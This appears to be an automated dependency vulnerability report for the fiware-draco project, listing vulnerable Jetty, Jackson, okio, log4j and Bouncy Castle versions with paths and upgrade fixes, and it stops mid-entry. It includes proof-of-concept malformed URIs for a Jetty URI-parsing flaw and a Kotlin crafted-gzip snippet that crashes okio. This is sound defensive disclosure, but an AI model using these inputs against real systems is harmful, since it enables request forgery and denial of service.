  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input via the HttpURI class due to insufficient validation on the authority segment of a URI. An attacker can manipulate the URI parsing to redirect requests or initiate server-side requests to unintended destinations by supplying malformed URIs that bypass validation checks.

Notes:

  1. This is only exploitable if the application uses decoded user data as encoded URIs in conjunction with the HttpURI class used directly;

  2. The Jetty usage of the HttpURI class is not vulnerable.

Workaround

This vulnerability can be mitigated by not passing decoded user data as encoded URIs to any URI class/method, including HttpURI.

PoC

http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.57.v20241219, 12.0.12 or higher.

References

medium severity

Improper Validation of Syntactic Correctness of Input

  • Vulnerable module: org.eclipse.jetty:jetty-server
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927

Overview

org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.

Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input via the HttpURI class due to insufficient validation on the authority segment of a URI. An attacker can manipulate the URI parsing to redirect requests or initiate server-side requests to unintended destinations by supplying malformed URIs that bypass validation checks.

Notes:

  1. This is only exploitable if the application uses decoded user data as encoded URIs in conjunction with the HttpURI class used directly;

  2. The Jetty usage of the HttpURI class is not vulnerable.

Workaround

This vulnerability can be mitigated by not passing decoded user data as encoded URIs to any URI class/method, including HttpURI.

PoC

http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/

Remediation

Upgrade org.eclipse.jetty:jetty-server to version 9.4.57.v20241219, 12.0.12 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: org.apache.nifi:nifi-json-utils@1.15.3, org.apache.nifi:nifi-processor-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.16.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) when using JDK serialization to serialize and deserialize JsonNode values. It is possible for the attacker to send a 4-byte length payload, with a value of Integer.MAX_VALUE , that will eventually cause large buffer allocation and out of heap memory.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.13.1, 2.12.6 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: org.apache.nifi:nifi-json-utils@1.15.3, org.apache.nifi:nifi-processor-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the _deserializeFromArray() function in BeanDeserializer, due to resource exhaustion when processing a deeply nested array.

NOTE: For this vulnerability to be exploitable the non-default DeserializationFeature must be enabled.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.7.1, 2.13.4 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: org.apache.nifi:nifi-json-utils@1.15.3, org.apache.nifi:nifi-processor-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the _deserializeWrappedValue() function in StdDeserializer.java, due to resource exhaustion when processing deeply nested arrays.

NOTE: This vulnerability is only exploitable when the non-default UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.7.1, 2.13.4.1 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.squareup.okio:okio
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.squareup.okhttp:okhttp@2.7.5 com.squareup.okio:okio@1.6.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.squareup.okhttp:okhttp@2.7.5 com.squareup.okio:okio@1.6.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.squareup.okhttp:okhttp@2.7.5 com.squareup.okio:okio@1.6.0

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) due to improper exception handling by the GzipSource class when parsing a malformed gzip buffer.

This vulnerability can be exploited on the Okio client when handling a crafted GZIP archive.

PoC

val gzBuf: Buffer = Buffer()
    try {
        val gzByteString: ByteString = ("1f8b41ff424242424343ffff").decodeHex()
        gzBuf.write(gzByteString)
        val gz: GzipSource = GzipSource(gzBuf)
        val sinkBuf: Buffer = Buffer()
        gz.read(sinkBuf, 5)
    }
    catch(e: IOException) {
        println("got error: " + e.toString())
    }

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.squareup.okio:okio to version 1.17.6, 3.4.0 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to Denial of Service (DoS). When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted, deeply nested hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve denial of service when the object is deserialized.

This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x org.apache.logging.log4j/log4j-core.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

There is no fixed version for log4j:log4j.

References

medium severity

Observable Discrepancy

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
